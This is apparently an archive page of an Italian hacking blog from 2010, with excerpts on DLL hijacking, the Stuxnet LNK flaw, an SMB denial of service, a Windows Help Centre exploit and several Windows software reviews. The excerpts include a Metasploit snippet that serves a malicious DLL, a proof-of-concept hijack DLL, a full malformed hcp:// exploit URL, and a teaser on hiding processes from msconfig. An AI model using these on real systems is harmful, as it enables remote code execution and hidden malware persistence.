Categorie:


Translate:
Italiano flagInglese flagFrancese flagTedesco flagPortoghese flagSpagnolo flag

Tag: ‘Windows’

Tools for search DLL Hijacking Vulnerabilities

settembre 2nd, 2010 by clshack

Maggiori info su questa vulnerabilità, le possiamo trovare qui:

[DLL Hijacking] Windows 7 and more application Remote code Exuction => metasplooit

Vediamo ora come cercare applicazioni vulnerabili :D


Sempre nell’articolo sopra citato, ho mostrato come con metasploit è possibile sfruttare questa vulnerabilità, sfruttando webdav, anche da remoto.

L’exploit creato da HD moore, sviluppatore metaploit è molto semplice.
Il codice che interessa a noi è:

                if (request.uri =~ /\.(dll|dl|drv|cpl)$/i)
                        print_status("#{cli.peerhost}:#{cli.peerport} GET => DLL Payload")
                        return if ((p = regenerate_payload(cli)) == nil)
                        data = Msf::Util::EXE.to_win32pe_dll(framework, p.encoded)
                        send_response(cli, data, { 'Content-Type' => 'application/octet-stream' })
                        return
               end


(continua…)

Tags: , , , , , ,
Posted in Hacking, Software, Windows | 2 Comments »

[DLL Hijacking] Windows 7 and more application Remote code Exuction => metasplooit

agosto 25th, 2010 by clshack

Questa nuova (non così nuova -.-’ ) del DLL Hijacking Exploit sta aprendo le porte a moltissimi virus.
Una immagine illustrativa di alcune applicazzioni vulnerabili:

Applicazioni che vanno incorporate di windows, a firefox e molte altre ancora.

Come funziona questa tecnica ?
(detta alla cazzo di cane merda -.-’ fuck off )
Durante la scrittura di applicazioni, si setta che il programma vada a prendersi delle funzioni contenute nelle dll (librerie).
La cosa errata è che se il programma richiama la dll “h.dll” e questa dll si trova dentro al file che viene aperto, se la PATH non è imposta il programma andrà a cercare la dll h.dll in varie destinazioni tra cui quella dove è situato il file aperto, perciò il programma, carica la falsa dll che avrà le stesse funzioni, della vera dll ma che eseguirà codice malevolo :D .
Ad esempio questo exploit per l’applicazione wap.exe di windows 7:

#include 
#define DLLIMPORT __declspec (dllexport)
int evil()
{
  WinExec("calc", 0);
  exit(0);
  return 0;
}

BOOL WINAPI DllMain(HINSTANCE hinstDLL,DWORD fdwReason, LPVOID lpvReserved)
{
  evil();
  return 0;
}


(continua…)

Tags: , , ,
Posted in Hacking, Software | 22 Comments »

[MS10-054]Metasploit:Remote DOS Microsoft SMB Server Trans2

agosto 12th, 2010 by clshack

E il nostro amico g-laurent, famoso per i suoi exploit ha scoperto una nuova vulnerabilità del protocollo SMB di windows :P

Cosa possiamo fare con questo exploit o.O ?

Dal sito microsoft:

Vulnerability details

In order to exploit CVE-2010-2550, the attacker must have read permission on a SMB share on the target system. This implies that the attacker is authenticated, or that the target allows anonymous access to network shares (this is a default configuration only on Windows XP with later platforms requiring authentication by default)

(continua…)

Tags: , , , ,
Posted in Hacking, Software | No Comments »

[CVE-2010-2568]Metasploit:windows Oday Remote Code Exuction

luglio 28th, 2010 by clshack

Ne parlano quasi tutti, però non tutti sanno che è uscito il modulo, per sfruttare questo exploit con metasploit :D
Stuxnet, è un worm che si sta diffondendo sempre più velocemnte, sfruttando la vulnerabilità:CVE-2010-2568 che sfrutta una solita cattiva gestione dei file LNK di windows, permettendo ad attaccker di eseguire codice remoto sulla vittima, oppure propagando i file maligni tramite supporti rimovibili.


I prodotti vulnerabili, sono:

  • Windows XP Service Pack 3
  • Windows XP Professional x64 Edition Service Pack 2
  • Windows Server 2003 Service Pack 2
  • Windows Server 2003 x64 Edition Service Pack 2
  • Windows Server 2003 with SP2 for Itanium-based Systems
  • Windows Vista Service Pack 1 and Windows Vista Service Pack 2
  • Windows Vista x64 Edition Service Pack 1 and Windows Vista x64 Edition Service Pack 2
  • Windows Server 2008 for 32-bit Systems and Windows Server 2008 for 32-bit Systems Service Pack 2
  • Windows Server 2008 for x64-based Systems and Windows Server 2008 for x64-based Systems Service Pack 2
  • Windows Server 2008 for Itanium-based Systems and Windows Server 2008 for Itanium-based Systems Service Pack 2
  • Windows 7 for 32-bit Systems
  • Windows 7 for x64-based Systems
  • Windows Server 2008 R2 for x64-based Systems
  • Windows Server 2008 R2 for Itanium-based Systems

Vediamo come sfruttare questa vulnerabilità con metasploit :D
(continua…)

Tags: , , , , ,
Posted in GNU/Linux, Hacking, Software | 17 Comments »

[EXPLOIT]Windows Help Centre Remote code Excution

giugno 10th, 2010 by clshack

Un altro exploit per windows, che permette l’esecuzione di comandi sul pc della vittima.
Bisogna passare a linux :D

Ma vediamo come funziona questo exploit, chiamato:
Microsoft Windows Help Centre Handles Malformed Escape Sequences Incorrectly

Questo exploit, sfruttando i file asx possiamo aprire il windows help con un url malformato e far aprire ad esempio la
calcolatrice :D

I file asx, sono:

An ASX file (Advanced Stream Redirector) is a special type of file which works closely with Windows Media ASF files.

L’url malformato in questione è composto cosi:
<iframe src="hcp://services/search?query=anything&topic=hcp://system/sysinfo/sysinfomain.htm%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A..%5C..%5Csysinfomain.htm%u003fsvr=%3Cscript%20defer%3Eeval%28unescape%28%27Run%2528%2522calc.exe%2522%2529%27%29%29%3C/script%3E">
(continua…)

Tags: , , , , , ,
Posted in Hacking, Software, Windows | 1 Comment »

Se7en Lite: Crea un TUO personalizzato WINDOWS 7 (anche usb)

marzo 18th, 2010 by clshack

Si bla, sarà da mesi che non scrivo articoli riguardanti il mondo windows, però penso che questo programma possa veramente essere utile a qualcuno :)

Se7en Lite, può creare ISO personalizzate, nonchè trasferibili su penna USB, di Windows 7.
L’unico e fondamentale requisito, è possedere il un DVD di installazione di Windows Seven.

(continua…)

Tags: , ,
Posted in Software, Windows | 3 Comments »

muCommander: ottimo File-Manager per Windows e Linux :)

febbraio 28th, 2010 by clshack

muCommander è un ottimo programma gratuito che permette una gestione dei file molto simile a quella di TotalCommander per windows però su Linux(e windows :) [e mac ] ).

muCommander, oltre alle basilari operazioni che si possono compiere sui file/cartelle, è in grado di sincronizzare contenuti (perfino con un server FTP), di visualizzare e di modificare i contenuti di una cartella compressa e perfino di visualizzare immagini, tra altre cose.

(continua…)

Tags: , ,
Posted in GNU/Linux, Software, Windows | 1 Comment »

Nessus 4.2: (Scanner di vulnerabilità) per WINDOWS e UBUNTU

febbraio 24th, 2010 by clshack

Nessus e’ uno scanner di vulnerabilita’ che sonda le vostre macchine utilizzando un’ aggiornatissimo database di vulnerabilita’, avvisandovi se dovesse trovare dei buchi di sicurezza e fornendo dettagliate analisi su come chiudere l’ eventuale buco.

Nessus e’ lo scanner per vulnerabilita’ piu’ famoso al mondo, usato da piu’ di 75000 organizzazioni internazzionali. Molte delle piu’ grandi aziende mondiali stanno realizzando un risparmio significativo dei costi utilizzando nessus per l’ audit di applicazioni e dispositivi buisness-critical.


Non molto tempo fa, avevo parlato di openvas che non è altro che una evuluzione di nessus, poichè nessus non era stato pacchettizzato per ubuntu 9.10 .
Aritoclo qui:[Scanner di Vulnerabilità]Compilare OpenVAS 3 su UBUNTU

Però, la nuova versione di nessus, è pacchettivata anche per ubuntu 9.10 :) e per windows 7 :)
Questa nuova versione introduce un paio di cambiamenti:

  • * Fixed a memory leak when NASL was running with safe checks disabled

    • (continua…)

Tags: , , ,
Posted in GNU/Linux, Hacking, Software, Windows | No Comments »

BoostSpeed: Velocizzare/Ottimizzare Windows 7 in velocità :)

febbraio 19th, 2010 by clshack

Ogni tanto, ripeto ogni tanto, bla parlo anche di windows a mio malincuore :P

Ma, BoostSpeed mi ha davvero stupito, windows 7 “soffre” anche lui di alcuni problemini, che col passare del tempo, diminuiscono le prestazioni del nostro Windows 7.


Avevamo già visto alcuni software per velocizzare windows 7 ma questo, dal mio punto di vista funziona veramente bene, mediante tutta una serie di ottimizzazioni del sistema che vanno dalla classica correzione automatica degli errori del registry alla deframmentazione e pulizia del disco.
(continua…)

Tags: , ,
Posted in Software, Windows | 1 Comment »

(hack)Nascondere un processo in avvio :) [windows -.-' bah ]

febbraio 14th, 2010 by clshack

I virus su windows, sono ovunque ma noi li cerchiamo solo nell’avio automatico o nei servizi.
Quando gli “esperti” ,forse un po’ troppa gente si sente esperta, cerca i virus, a un’analisi non approfondita sui processi che partono all’avvio, cioè dove partono i virus in generale.
Ci si limita ad avviare windows, e digitare msconfig.


Vediamo ora come nascondere ad msconfig ed agli altri sistemi di ricerca dei programmi in avvio automatico un eseguibile.
(continua…)

Tags: , ,
Posted in Hacking | 4 Comments »
« Older Entries